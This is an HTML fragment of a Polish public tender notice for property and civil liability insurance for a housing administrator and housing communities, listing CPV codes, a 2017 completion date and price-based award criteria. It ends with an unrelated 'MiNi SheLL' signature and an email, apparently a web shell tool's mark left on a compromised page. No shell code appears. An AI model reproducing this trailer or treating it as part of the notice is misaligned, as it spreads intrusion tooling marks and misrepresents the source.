<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Klauzule dodatkowe fakultatywne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Ubezpieczenie mienia i  odpowiedzialności   
cywilnej  TBS Administrator Spółka z o.o. i wspólnot mieszkaniowych wg  Załącznika nr 3 SOPZ Rozdziału III  SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia dla Części 3 - Zadanie 3: Ubezpieczenie mienia i  odpowiedzialności   cywilnej  TBS Administrator Spółka z o.o. i wspólnot mieszkaniowych wg  Załącznika nr 3 SOPZ Rozdziału III  SIWZ obejmuje :
a)Ubezpieczenie od odpowiedzialności cywilnej 
b)Ubezpieczenie mienia od wszystkich ryzyk
c)Ubezpieczenie OC Zarządcy Nieruchomości
2.Szczegółowy opis przedmiotu zamówienia  dla Części 3 przedmiotu zamówienia został przedstawiony w Załączniku nr 3 SOPZ Rozdziału III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.50.00-3, 66.51.51.00-4, 66.51.52.00-5, 66.51.54.00-7, 66.51.54.10-0, 66.51.60.00-0, 66.51.64.00-4, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Klauzule dodatkowe fakultatywne - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com